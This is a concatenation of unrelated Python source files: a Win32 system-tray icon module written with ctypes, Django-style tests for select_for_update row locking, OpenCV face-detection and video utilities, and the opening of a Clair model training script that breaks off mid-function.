    hwnd = ctypes.windll.user32.CreateWindowExW(0, newclass.lpszClassName, None, WS_POPUP, 0, 0, 0, 0, 0, 0, 0, 0)
    return hwnd


# Message loop calls
TIMERCALLBACK = ctypes.WINFUNCTYPE(None,
                                   ctypes.wintypes.HWND,
                                   ctypes.wintypes.UINT,
                                   ctypes.POINTER(ctypes.wintypes.UINT),
                                   ctypes.wintypes.DWORD)

SetTimer = ctypes.windll.user32.SetTimer
SetTimer.restype = ctypes.POINTER(ctypes.wintypes.UINT)
SetTimer.argtypes = [ctypes.wintypes.HWND,
                     ctypes.POINTER(ctypes.wintypes.UINT),
                     ctypes.wintypes.UINT,
                     TIMERCALLBACK]

KillTimer = ctypes.windll.user32.KillTimer
KillTimer.restype = ctypes.wintypes.BOOL
KillTimer.argtypes = [ctypes.wintypes.HWND,
                      ctypes.POINTER(ctypes.wintypes.UINT)]


class MSG(ctypes.Structure):
    """ctypes mirror of the Win32 MSG structure consumed by GetMessage /
    TranslateMessage / DispatchMessage.  POINT is defined earlier in this
    module."""
    _fields_ = [
        ('HWND', ctypes.wintypes.HWND),
        ('message', ctypes.wintypes.UINT),
        ('wParam', ctypes.wintypes.WPARAM),
        ('lParam', ctypes.wintypes.LPARAM),
        ('time', ctypes.wintypes.DWORD),
        ('pt', POINT)]


# Wide-character message-pump bindings.
GetMessage = ctypes.windll.user32.GetMessageW
GetMessage.restype = ctypes.wintypes.BOOL
GetMessage.argtypes = [ctypes.POINTER(MSG), ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.UINT]
TranslateMessage = ctypes.windll.user32.TranslateMessage
TranslateMessage.restype = ctypes.wintypes.ULONG
TranslateMessage.argtypes = [ctypes.POINTER(MSG)]
DispatchMessage = ctypes.windll.user32.DispatchMessageW
DispatchMessage.restype = ctypes.wintypes.ULONG
DispatchMessage.argtypes = [ctypes.POINTER(MSG)]


def LoadIcon(iconfilename, small=False):
    """Load an .ico file from disk via user32!LoadImage.  When *small* is
    true a 16x16 icon is requested (tray size); otherwise the default size
    (0 means "use the resource's size")."""
    return LoadImage(0, unicode(iconfilename), IMAGE_ICON, 16 if small else 0, 16 if small else 0, LR_LOADFROMFILE)


class NotificationIcon(object):
    """A Windows system-tray (notification area) icon with a right-click
    popup menu and balloon ("bubble") announcements, implemented with raw
    ctypes Win32 calls.  The caller populates ``self.items`` with menu
    entries (see _menu for the accepted formats) and drives the icon by
    calling _run(), which blocks pumping window messages until die() is
    called or the main thread exits.

    NOTE: this module is Python 2 (print statements, ``except E, err``,
    ``unicode``/``basestring``) and Windows-only (ctypes.windll).
    """

    def __init__(self, iconfilename, tooltip=None):
        # Fail fast if the icon file is missing or unloadable.
        assert os.path.isfile(unicode(iconfilename)), "{} doesn't exist".format(iconfilename)
        self._iconfile = unicode(iconfilename)
        self._hicon = LoadIcon(self._iconfile, True)
        assert self._hicon, "Failed to load {}".format(iconfilename)
        #self._pumpqueue = Queue.Queue()
        self._die = False
        self._timerid = None
        # Per-instance UUID used as the hidden window's class name.
        self._uid = uuid.uuid4()
        self._tooltip = unicode(tooltip) if tooltip else u''
        #self._thread = threading.Thread(target=self._run)
        #self._thread.start()
        # Pending balloon text; consumed by _bubble().
        self._info_bubble = None
        # Menu entries; see _menu() for the accepted item formats.
        self.items = []

    def _bubble(self, iconinfo):
        """If an announcement is pending, show it as a balloon notification
        by modifying the existing tray icon."""
        if self._info_bubble:
            info_bubble = self._info_bubble
            self._info_bubble = None
            # NOTE(review): self._info_bubble was just set to None above, so
            # this produces u'None' rather than the saved text; it looks like
            # this was meant to be unicode(info_bubble) — confirm and fix.
            message = unicode(self._info_bubble)
            iconinfo.uFlags |= NIF_INFO
            iconinfo.szInfo = message
            iconinfo.szInfoTitle = message
            iconinfo.dwInfoFlags = NIIF_INFO
            iconinfo.union.uTimeout = 10000
            Shell_NotifyIcon(NIM_MODIFY, ctypes.pointer(iconinfo))

    def _run(self):
        """Create the hidden message window, add the tray icon, and pump
        window messages until self._die is set; then remove the icon and
        destroy the window/icon handles.  Blocks the calling thread."""
        # Message broadcast by Explorer when the taskbar is (re)created;
        # handled in _callback to re-add the icon after an Explorer restart.
        self.WM_TASKBARCREATED = ctypes.windll.user32.RegisterWindowMessageW(u'TaskbarCreated')

        # Keep a reference to the WNDPROC wrapper so it is not GC'd while
        # Windows still holds the callback pointer.
        self._windowproc = WNDPROC(self._callback)
        self._hwnd = GenerateDummyWindow(self._windowproc, str(self._uid))

        iconinfo = NOTIFYICONDATA()
        iconinfo.hWnd = self._hwnd
        iconinfo.uID = 100
        iconinfo.uFlags = NIF_ICON | NIF_SHOWTIP | NIF_MESSAGE | (NIF_TIP if self._tooltip else 0)
        # Clicks on the icon are delivered to _callback as WM_MENUCOMMAND.
        iconinfo.uCallbackMessage = WM_MENUCOMMAND
        iconinfo.hIcon = self._hicon
        iconinfo.szTip = self._tooltip

        Shell_NotifyIcon(NIM_ADD, ctypes.pointer(iconinfo))

        self.iconinfo = iconinfo

        # Wake the message loop once so it starts processing promptly.
        PostMessage(self._hwnd, WM_NULL, 0, 0)

        message = MSG()
        last_time = -1
        ret = None
        while not self._die:
            try:
                ret = GetMessage(ctypes.pointer(message), 0, 0, 0)
                TranslateMessage(ctypes.pointer(message))
                DispatchMessage(ctypes.pointer(message))
            except Exception, err:
                # Swallow dispatch errors and start over with a fresh MSG;
                # a dead message loop would strand the tray icon.
                # print "NotificationIcon error", err, message
                message = MSG()
            # Throttle the loop; also gives die() a chance to be observed.
            time.sleep(0.125)
        print "Icon thread stopped, removing icon..."

        Shell_NotifyIcon(NIM_DELETE,
                         ctypes.cast(ctypes.pointer(iconinfo),
                                     ctypes.POINTER(NOTIFYICONDATA)))
        ctypes.windll.user32.DestroyWindow(self._hwnd)
        ctypes.windll.user32.DestroyIcon(self._hicon)

    def _menu(self):
        """Build and show the popup menu from self.items at the cursor
        position, then invoke the callable of the selected entry (if any).

        Item formats:
          * a string of only '-'/'_'/'=' chars -> separator
          * any other bare string             -> greyed-out label
          * (label_or_callable, callback) tuple; a label starting with '!'
            marks the default item, '+' renders it checked; callback False
            disables the entry, a non-callable greys it out.
        """
        if not hasattr(self, 'items'):
            return

        menu = CreatePopupMenu()
        func = None

        try:
            # Menu item ids start above 1000 to avoid colliding with
            # anything Windows reserves.
            iidx = 1000
            defaultitem = -1
            item_map = {}
            for fs in self.items:
                iidx += 1
                if isinstance(fs, basestring):
                    if fs and not fs.strip('-_='):
                        AppendMenu(menu, MF_SEPARATOR, iidx, fs)
                    else:
                        AppendMenu(menu, MF_STRING | MF_GRAYED, iidx, fs)
                elif isinstance(fs, tuple):
                    # Labels may be callables for dynamic text.
                    if callable(fs[0]):
                        itemstring = fs[0]()
                    else:
                        itemstring = unicode(fs[0])
                    flags = MF_STRING
                    if itemstring.startswith("!"):
                        itemstring = itemstring[1:]
                        defaultitem = iidx
                    if itemstring.startswith("+"):
                        itemstring = itemstring[1:]
                        flags = flags | MF_CHECKED
                    itemcallable = fs[1]
                    item_map[iidx] = itemcallable
                    if itemcallable is False:
                        flags = flags | MF_DISABLED
                    elif not callable(itemcallable):
                        flags = flags | MF_GRAYED
                    AppendMenu(menu, flags, iidx, itemstring)

            if defaultitem != -1:
                SetMenuDefaultItem(menu, defaultitem, 0)

            pos = POINT()
            GetCursorPos(ctypes.pointer(pos))
            PostMessage(self._hwnd, WM_NULL, 0, 0)
            # The window must be foreground for TrackPopupMenu to dismiss
            # correctly when the user clicks elsewhere.
            SetForegroundWindow(self._hwnd)
            # TPM_RETURNCMD makes TrackPopupMenu return the selected item id
            # instead of posting a message.
            ti = TrackPopupMenu(menu, TPM_RIGHTBUTTON | TPM_RETURNCMD | TPM_NONOTIFY, pos.x, pos.y, 0, self._hwnd, None)
            if ti in item_map:
                func = item_map[ti]
            PostMessage(self._hwnd, WM_NULL, 0, 0)
        finally:
            DestroyMenu(menu)
        # Invoke outside the try/finally so menu resources are released first.
        if func:
            func()

    def clicked(self):
        """Left-click handler; default behaviour is to open the menu.
        Callers may rebind this attribute (see the __main__ demo below)."""
        self._menu()

    def _callback(self, hWnd, msg, wParam, lParam):
        """Window procedure for the hidden window: routes timer ticks,
        icon clicks and taskbar re-creation; everything else goes to
        DefWindowProc."""
        # Check if the main thread is still alive
        if msg == WM_TIMER:
            if not any(thread.getName() == 'MainThread' and thread.isAlive()
                       for thread in threading.enumerate()):
                self._die = True
        elif msg == WM_MENUCOMMAND and lParam == WM_LBUTTONUP:
            self.clicked()
        elif msg == WM_MENUCOMMAND and lParam == WM_RBUTTONUP:
            self._menu()
        elif msg == self.WM_TASKBARCREATED:
            # Explorer restarted, add the icon again.
            Shell_NotifyIcon(NIM_ADD, ctypes.pointer(self.iconinfo))
        else:
            return DefWindowProc(hWnd, msg, wParam, lParam)
        return 1

    def die(self):
        """Request shutdown of the message loop and best-effort removal of
        the tray icon and window/icon handles."""
        self._die = True
        # Wake the loop so it notices self._die.
        PostMessage(self._hwnd, WM_NULL, 0, 0)
        time.sleep(0.2)
        try:
            # NOTE(review): unlike the calls elsewhere, this passes the
            # struct itself rather than ctypes.pointer(self.iconinfo);
            # presumably that raises and is swallowed below — confirm.
            Shell_NotifyIcon(NIM_DELETE, self.iconinfo)
        except Exception, err:
            print "Icon remove error", err
        ctypes.windll.user32.DestroyWindow(self._hwnd)
        ctypes.windll.user32.DestroyIcon(self._hicon)

    def pump(self):
        """Drain and execute queued callables.  NOTE(review): the
        _pumpqueue attribute is commented out in __init__, so calling this
        as-is raises AttributeError — re-enable the queue before use."""
        try:
            while not self._pumpqueue.empty():
                callable = self._pumpqueue.get(False)
                callable()
        except queue_Empty:
            pass

    def announce(self, text):
        """Queue *text* for display as a balloon notification (picked up
        by _bubble on the next opportunity)."""
        self._info_bubble = text


def hideConsole():
    # SW_HIDE (0) the process's console window.
    ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)


def showConsole():
    # SW_SHOWNORMAL (1) the process's console window.
    ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)


def hasConsole():
    # Non-zero handle means the process is attached to a console.
    return ctypes.windll.kernel32.GetConsoleWindow() != 0


if __name__ == "__main__":
    # Interactive demo: a tray icon with a mix of static, dynamic, default,
    # checked and disabled entries.
    import time

    def greet():
        ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)
        print "Hello"

    def quit():
        ni._die = True

    def announce():
        ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1)
        ni.announce("Hello there")

    def clicked():
        ni.announce("Hello")

    def dynamicTitle():
        return "!The time is: %s" % time.time()

    ni = NotificationIcon(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../trayicon.ico'), "SBTC 0.1.0")
    ni.items = [
        (dynamicTitle, False),
        ('Hello', greet),
        ('Title', False),
        ('!Default', greet),
        ('+Popup bubble', announce),
        'Nothing',
        '--',
        ('Quit', quit)
    ]
    ni.clicked = clicked
    import atexit

    @atexit.register
    def goodbye():
        print "You are now leaving the Python sector."

    ni._run()
tests.py
import threading
import time
from unittest import mock

from multiple_database.routers import TestRouter

from djmodels.core.exceptions import FieldError
from djmodels.db import (
    DatabaseError, NotSupportedError, connection, connections, router,
    transaction,
)
from djmodels.test import (
    TransactionTestCase, override_settings, skipIfDBFeature,
    skipUnlessDBFeature,
)
from djmodels.test.utils import CaptureQueriesContext

from .models import City, Country, Person, PersonProfile


class SelectForUpdateTests(TransactionTestCase):
    """Tests for QuerySet.select_for_update(): SQL generation for the
    NOWAIT / SKIP LOCKED / OF variants, backend feature gating, and actual
    row-locking behaviour exercised with a second database connection and
    worker threads.  Uses TransactionTestCase because real transactions
    (and their visibility to other connections) are required."""

    available_apps = ['select_for_update']

    def setUp(self):
        # This is executed in autocommit mode so that code in
        # run_select_for_update can see this data.
        self.country1 = Country.objects.create(name='Belgium')
        self.country2 = Country.objects.create(name='France')
        self.city1 = City.objects.create(name='Liberchies', country=self.country1)
        self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
        self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
        self.person_profile = PersonProfile.objects.create(person=self.person)

        # We need another database connection in transaction to test that one
        # connection issuing a SELECT ... FOR UPDATE will block.
        self.new_connection = connection.copy()

    def tearDown(self):
        # End any blocking transaction a test left open; AttributeError
        # means start_blocking_transaction() was never called in this test.
        try:
            self.end_blocking_transaction()
        except (DatabaseError, AttributeError):
            pass
        self.new_connection.close()

    def start_blocking_transaction(self):
        """Open a transaction on the second connection and lock all Person
        rows with SELECT ... FOR UPDATE, so the main connection blocks."""
        self.new_connection.set_autocommit(False)
        # Start a blocking transaction. At some point,
        # end_blocking_transaction() should be called.
        self.cursor = self.new_connection.cursor()
        sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
            'db_table': Person._meta.db_table,
            'for_update': self.new_connection.ops.for_update_sql(),
        }
        self.cursor.execute(sql, ())
        self.cursor.fetchone()

    def end_blocking_transaction(self):
        # Roll back the blocking transaction.
        self.cursor.close()
        self.new_connection.rollback()
        self.new_connection.set_autocommit(True)

    def has_for_update_sql(self, queries, **kwargs):
        # Examine the SQL that was executed to determine whether it
        # contains the 'SELECT..FOR UPDATE' stanza.
        for_update_sql = connection.ops.for_update_sql(**kwargs)
        return any(for_update_sql in query['sql'] for query in queries)

    @skipUnlessDBFeature('has_select_for_update')
    def test_for_update_sql_generated(self):
        """
        The backend's FOR UPDATE variant appears in
        generated SQL when select_for_update is invoked.
        """
        with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
            list(Person.objects.all().select_for_update())
        self.assertTrue(self.has_for_update_sql(ctx.captured_queries))

    @skipUnlessDBFeature('has_select_for_update_nowait')
    def test_for_update_sql_generated_nowait(self):
        """
        The backend's FOR UPDATE NOWAIT variant appears in
        generated SQL when select_for_update is invoked.
        """
        with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
            list(Person.objects.all().select_for_update(nowait=True))
        self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))

    @skipUnlessDBFeature('has_select_for_update_skip_locked')
    def test_for_update_sql_generated_skip_locked(self):
        """
        The backend's FOR UPDATE SKIP LOCKED variant appears in
        generated SQL when select_for_update is invoked.
        """
        with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
            list(Person.objects.all().select_for_update(skip_locked=True))
        self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))

    @skipUnlessDBFeature('has_select_for_update_of')
    def test_for_update_sql_generated_of(self):
        """
        The backend's FOR UPDATE OF variant appears in the generated SQL when
        select_for_update() is invoked.
        """
        with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
            # Chained select_for_update(of=...) calls: the last one wins.
            list(Person.objects.select_related(
                'born__country',
            ).select_for_update(
                of=('born__country',),
            ).select_for_update(
                of=('self', 'born__country')
            ))
        features = connections['default'].features
        if features.select_for_update_of_column:
            expected = ['"select_for_update_person"."id"', '"select_for_update_country"."id"']
        else:
            expected = ['"select_for_update_person"', '"select_for_update_country"']
        if features.uppercases_column_names:
            expected = [value.upper() for value in expected]
        self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))

    @skipUnlessDBFeature('has_select_for_update_of')
    def test_for_update_of_followed_by_values(self):
        with transaction.atomic():
            values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
        self.assertEqual(values, [{'pk': self.person.pk}])

    @skipUnlessDBFeature('has_select_for_update_of')
    def test_for_update_of_followed_by_values_list(self):
        with transaction.atomic():
            values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
        self.assertEqual(values, [(self.person.pk,)])

    @skipUnlessDBFeature('has_select_for_update_of')
    def test_for_update_of_self_when_self_is_not_selected(self):
        """
        select_for_update(of=['self']) when the only columns selected are
        from related tables.
        """
        with transaction.atomic():
            values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
        self.assertEqual(values, [{'born__name': self.city1.name}])

    @skipUnlessDBFeature('has_select_for_update_nowait')
    def test_nowait_raises_error_on_block(self):
        """
        If nowait is specified, we expect an error to be raised rather
        than blocking.
        """
        self.start_blocking_transaction()
        status = []

        thread = threading.Thread(
            target=self.run_select_for_update,
            args=(status,),
            kwargs={'nowait': True},
        )

        thread.start()
        time.sleep(1)
        thread.join()
        self.end_blocking_transaction()
        self.assertIsInstance(status[-1], DatabaseError)

    @skipUnlessDBFeature('has_select_for_update_skip_locked')
    def test_skip_locked_skips_locked_rows(self):
        """
        If skip_locked is specified, the locked row is skipped resulting in
        Person.DoesNotExist.
        """
        self.start_blocking_transaction()
        status = []
        thread = threading.Thread(
            target=self.run_select_for_update,
            args=(status,),
            kwargs={'skip_locked': True},
        )
        thread.start()
        time.sleep(1)
        thread.join()
        self.end_blocking_transaction()
        self.assertIsInstance(status[-1], Person.DoesNotExist)

    @skipIfDBFeature('has_select_for_update_nowait')
    @skipUnlessDBFeature('has_select_for_update')
    def test_unsupported_nowait_raises_error(self):
        """
        NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
        a database backend that supports FOR UPDATE but not NOWAIT.
        """
        with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
            with transaction.atomic():
                Person.objects.select_for_update(nowait=True).get()

    @skipIfDBFeature('has_select_for_update_skip_locked')
    @skipUnlessDBFeature('has_select_for_update')
    def test_unsupported_skip_locked_raises_error(self):
        """
        NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is
        run on a database backend that supports FOR UPDATE but not SKIP
        LOCKED.
        """
        with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
            with transaction.atomic():
                Person.objects.select_for_update(skip_locked=True).get()

    @skipIfDBFeature('has_select_for_update_of')
    @skipUnlessDBFeature('has_select_for_update')
    def test_unsupported_of_raises_error(self):
        """
        NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
        a database backend that supports FOR UPDATE but not OF.
        """
        msg = 'FOR UPDATE OF is not supported on this database backend.'
        with self.assertRaisesMessage(NotSupportedError, msg):
            with transaction.atomic():
                Person.objects.select_for_update(of=('self',)).get()

    @skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
    def test_unrelated_of_argument_raises_error(self):
        """
        FieldError is raised if a non-relation field is specified in of=(...).
        """
        msg = (
            'Invalid field name(s) given in select_for_update(of=(...)): %s. '
            'Only relational fields followed in the query are allowed. '
            'Choices are: self, born, born__country.'
        )
        invalid_of = [
            ('nonexistent',),
            ('name',),
            ('born__nonexistent',),
            ('born__name',),
            ('born__nonexistent', 'born__name'),
        ]
        for of in invalid_of:
            with self.subTest(of=of):
                with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
                    with transaction.atomic():
                        Person.objects.select_related('born__country').select_for_update(of=of).get()

    @skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
    def test_related_but_unselected_of_argument_raises_error(self):
        """
        FieldError is raised if a relation field that is not followed in the
        query is specified in of=(...).
        """
        msg = (
            'Invalid field name(s) given in select_for_update(of=(...)): %s. '
            'Only relational fields followed in the query are allowed. '
            'Choices are: self, born, profile.'
        )
        for name in ['born__country', 'died', 'died__country']:
            with self.subTest(name=name):
                with self.assertRaisesMessage(FieldError, msg % name):
                    with transaction.atomic():
                        Person.objects.select_related(
                            'born', 'profile',
                        ).exclude(profile=None).select_for_update(of=(name,)).get()

    @skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
    def test_reverse_one_to_one_of_arguments(self):
        """
        Reverse OneToOneFields may be included in of=(...) as long as NULLs
        are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
        """
        with transaction.atomic():
            person = Person.objects.select_related(
                'profile',
            ).exclude(profile=None).select_for_update(of=('profile',)).get()
            self.assertEqual(person.profile, self.person_profile)

    @skipUnlessDBFeature('has_select_for_update')
    def test_for_update_after_from(self):
        # Patch the feature flag so the FOR UPDATE clause is placed right
        # after FROM (as e.g. MSSQL requires) and check the generated SQL.
        features_class = connections['default'].features.__class__
        attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
        with mock.patch(attribute_to_patch, return_value=True):
            with transaction.atomic():
                self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))

    @skipUnlessDBFeature('has_select_for_update')
    def test_for_update_requires_transaction(self):
        """
        A TransactionManagementError is raised
        when a select_for_update query is executed outside of a transaction.
        """
        msg = 'select_for_update cannot be used outside of a transaction.'
        with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
            list(Person.objects.all().select_for_update())

    @skipUnlessDBFeature('has_select_for_update')
    def test_for_update_requires_transaction_only_in_execution(self):
        """
        No TransactionManagementError is raised
        when select_for_update is invoked outside of a transaction -
        only when the query is executed.
        """
        people = Person.objects.all().select_for_update()
        msg = 'select_for_update cannot be used outside of a transaction.'
        with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
            list(people)

    @skipUnlessDBFeature('supports_select_for_update_with_limit')
    def test_select_for_update_with_limit(self):
        other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
        with transaction.atomic():
            qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
            self.assertEqual(qs[0], other)

    @skipIfDBFeature('supports_select_for_update_with_limit')
    def test_unsupported_select_for_update_with_limit(self):
        msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
        with self.assertRaisesMessage(NotSupportedError, msg):
            with transaction.atomic():
                list(Person.objects.all().order_by('pk').select_for_update()[1:2])

    def run_select_for_update(self, status, **kwargs):
        """
        Utility method that runs a SELECT FOR UPDATE against all
        Person instances. After the select_for_update, it attempts
        to update the name of the only record, save, and commit.

        This function expects to run in a separate thread.
        """
        status.append('started')
        try:
            # We need to enter transaction management again, as this is done on
            # per-thread basis
            with transaction.atomic():
                person = Person.objects.select_for_update(**kwargs).get()
                person.name = 'Fred'
                person.save()
        except (DatabaseError, Person.DoesNotExist) as e:
            status.append(e)
        finally:
            # This method is run in a separate thread. It uses its own
            # database connection. Close it without waiting for the GC.
            connection.close()

    @skipUnlessDBFeature('has_select_for_update')
    @skipUnlessDBFeature('supports_transactions')
    def test_block(self):
        """
        A thread running a select_for_update that accesses rows being touched
        by a similar operation on another connection blocks correctly.
        """
        # First, let's start the transaction in our thread.
        self.start_blocking_transaction()

        # Now, try it again using the ORM's select_for_update
        # facility. Do this in a separate thread.
        status = []
        thread = threading.Thread(
            target=self.run_select_for_update, args=(status,)
        )

        # The thread should immediately block, but we'll sleep
        # for a bit to make sure.
        thread.start()
        sanity_count = 0
        while len(status) != 1 and sanity_count < 10:
            sanity_count += 1
            time.sleep(1)
        if sanity_count >= 10:
            raise ValueError('Thread did not run and block')

        # Check the person hasn't been updated. Since this isn't
        # using FOR UPDATE, it won't block.
        p = Person.objects.get(pk=self.person.pk)
        self.assertEqual('Reinhardt', p.name)

        # When we end our blocking transaction, our thread should
        # be able to continue.
        self.end_blocking_transaction()
        thread.join(5.0)

        # Check the thread has finished. Assuming it has, we should
        # find that it has updated the person's name.
        self.assertFalse(thread.isAlive())

        # We must commit the transaction to ensure that MySQL gets a fresh read,
        # since by default it runs in REPEATABLE READ mode
        transaction.commit()

        p = Person.objects.get(pk=self.person.pk)
        self.assertEqual('Fred', p.name)

    @skipUnlessDBFeature('has_select_for_update')
    def test_raw_lock_not_available(self):
        """
        Running a raw query which can't obtain a FOR UPDATE lock raises
        the correct exception
        """
        self.start_blocking_transaction()

        def raw(status):
            try:
                list(
                    Person.objects.raw(
                        'SELECT * FROM %s %s' % (
                            Person._meta.db_table,
                            connection.ops.for_update_sql(nowait=True)
                        )
                    )
                )
            except DatabaseError as e:
                status.append(e)
            finally:
                # This method is run in a separate thread. It uses its own
                # database connection. Close it without waiting for the GC.
                # Connection cannot be closed on Oracle because cursor is still
                # open.
                if connection.vendor != 'oracle':
                    connection.close()

        status = []
        thread = threading.Thread(target=raw, kwargs={'status': status})
        thread.start()
        time.sleep(1)
        thread.join()
        self.end_blocking_transaction()
        self.assertIsInstance(status[-1], DatabaseError)

    @skipUnlessDBFeature('has_select_for_update')
    @override_settings(DATABASE_ROUTERS=[TestRouter()])
    def test_select_for_update_on_multidb(self):
        # select_for_update() queries must be routed to the write database.
        query = Person.objects.select_for_update()
        self.assertEqual(router.db_for_write(Person), query.db)

    @skipUnlessDBFeature('has_select_for_update')
    def test_select_for_update_with_get(self):
        with transaction.atomic():
            person = Person.objects.select_for_update().get(name='Reinhardt')
        self.assertEqual(person.name, 'Reinhardt')

    def test_nowait_and_skip_locked(self):
        # The two options are mutually exclusive.
        with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
            Person.objects.select_for_update(nowait=True, skip_locked=True)

    def test_ordered_select_for_update(self):
        """
        Subqueries should respect ordering as an ORDER BY clause may be useful
        to specify a row locking order to prevent deadlocks (#27193).
        """
        with transaction.atomic():
            qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
            self.assertIn('ORDER BY', str(qs.query))
opencv_utilities.py
import ntpath
from threading import Thread

import cv2 as cv
import numpy as np

import definitions


def getFaceFromImage(image):
    """Detect frontal faces in *image*.

    :param image: either a path to an image file or an already-loaded
                  BGR image (numpy array).
    :returns: sequence of (x, y, w, h) face rectangles as returned by
              cv.CascadeClassifier.detectMultiScale (empty if none found).
    :raises ValueError: if *image* is a path that cannot be read.
    """
    if isinstance(image, str):
        img = cv.imread(image)
        # cv.imread silently returns None on a bad path; fail loudly here
        # instead of letting cvtColor raise a cryptic cv2.error.
        if img is None:
            raise ValueError("Could not read image file: {}".format(image))
    else:
        img = image
    gray_img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
    # Resolve the cascade file via the installed cv2 package data directory
    # instead of a hard-coded absolute path, so this works on any machine.
    haar_classifier = cv.CascadeClassifier(
        cv.data.haarcascades + 'haarcascade_frontalface_alt2.xml')
    faces = haar_classifier.detectMultiScale(gray_img, scaleFactor=1.1, minNeighbors=5)
    return faces


def getFileNameFromPath(fileName):
    """Return the final path component (the file name) of *fileName*.

    Uses ntpath so both '/' and '\\' separators are handled.
    """
    # (A previous, discarded ntpath.basename(...) call on definitions.ROOT_DIR
    # was dead code and has been removed.)
    head, tail = ntpath.split(fileName)
    return tail


def writeImageText(image, text):
    """Draw *text* in red, centered horizontally in the lower half of
    *image* (in place), and return the image."""
    font = cv.FONT_HERSHEY_SIMPLEX

    # get boundary of this text
    textsize = cv.getTextSize(text, font, 1, 2)[0]

    # get coords based on boundary: centered in x, offset into the lower
    # half in y.
    textX = (image.shape[1] - textsize[0]) // 2
    textY = (image.shape[0] + textsize[1]) // 2 + (image.shape[0] // 2 - 20)

    # add text centered on image
    cv.putText(
        image, text, (textX, textY), font, 1, (0, 0, 255), 3
    )
    return image


def write_bb_image(boxes, labels, width_scale, height_scale, image, classes):
    """Draw scaled bounding boxes with class labels onto *image* (in place).

    :param boxes: iterable of (left, top, right, bottom) in model coordinates.
    :param labels: iterable of class indices, parallel to *boxes*.
    :param width_scale/height_scale: factors mapping model coords to pixels.
    :param image: BGR image to annotate.
    :param classes: sequence mapping a label index to its display name.
    :returns: the annotated image.
    """
    if len(boxes) > 0:
        for (left, top, right, bottom), label in zip(boxes, labels):
            # Scale model-space coordinates to pixel space.
            left = int(left * width_scale)
            top = int(top * height_scale)
            right = int(right * width_scale)
            bottom = int(bottom * height_scale)
            cv.rectangle(image, (left, top), (right, bottom), color=(255, 0, 0), thickness=3)
            cv.putText(
                image, classes[label], (left, top - 10),
                cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0)
            )
    return image


class VideoGet:
    """
    Class that continuously gets frames from a VideoCapture object
    with a dedicated thread.
    """

    def __init__(self, src=0):
        self.stream = cv.VideoCapture(src)
        # Grab one frame eagerly so self.frame is populated before the
        # display thread starts.
        (self.grabbed, self.frame) = self.stream.read()
        self.stopped = False
        self.video_show = VideoShow(self.frame).start()

    def start(self):
        """Start the background frame-grabbing thread; returns self for
        chaining."""
        Thread(target=self.get, args=()).start()
        return self

    def get(self):
        """Grab frames until stopped or the stream runs out, forwarding
        each frame to the display thread."""
        while not self.stopped:
            if not self.grabbed:
                self.stop()
            else:
                (self.grabbed, self.frame) = self.stream.read()
                self.video_show.frame = self.frame

    def stop(self):
        """Signal the grabbing loop to exit."""
        self.stopped = True


class VideoShow:
    """
    Class that continuously shows a frame using a dedicated thread.
    """

    def __init__(self, frame=None):
        self.frame = frame
        self.stopped = False

    def start(self):
        """Start the background display thread; returns self for chaining."""
        Thread(target=self.show, args=()).start()
        return self

    def show(self):
        """Display frames in a window until stopped; pressing 'q' stops."""
        while not self.stopped:
            cv.imshow("Video", self.frame)
            if cv.waitKey(1) == ord("q"):
                self.stopped = True

    def stop(self):
        """Signal the display loop to exit."""
        self.stopped = True
train.py
import sys
import os
import logging
import random
import numpy as np
from time import time
from argparse import ArgumentParser
from threading import Thread

from clair.model import Clair
import clair.utils as utils
import clair.evaluate as evaluate
import shared.param as param

logging.basicConfig(format='%(message)s', level=logging.INFO)


def is_last_five_epoch_approaches_minimum(validation_losses):
    # True while the best (minimum) validation loss seen so far was achieved
    # in one of the last five epochs, i.e. training is still improving.
    # With five or fewer epochs recorded there is not enough history, so
    # optimistically report True.
    if len(validation_losses) <= 5:
        return True
    minimum_validation_loss = min(np.asarray(validation_losses)[:, 0])
    return (
        validation_losses[-5][0] == minimum_validation_loss or
        validation_losses[-4][0] == minimum_validation_loss or
        validation_losses[-3][0] == minimum_validation_loss or
        validation_losses[-2][0] == minimum_validation_loss or
        validation_losses[-1][0] == minimum_validation_loss
    )


def is_validation_loss_goes_up_and_down(validation_losses):
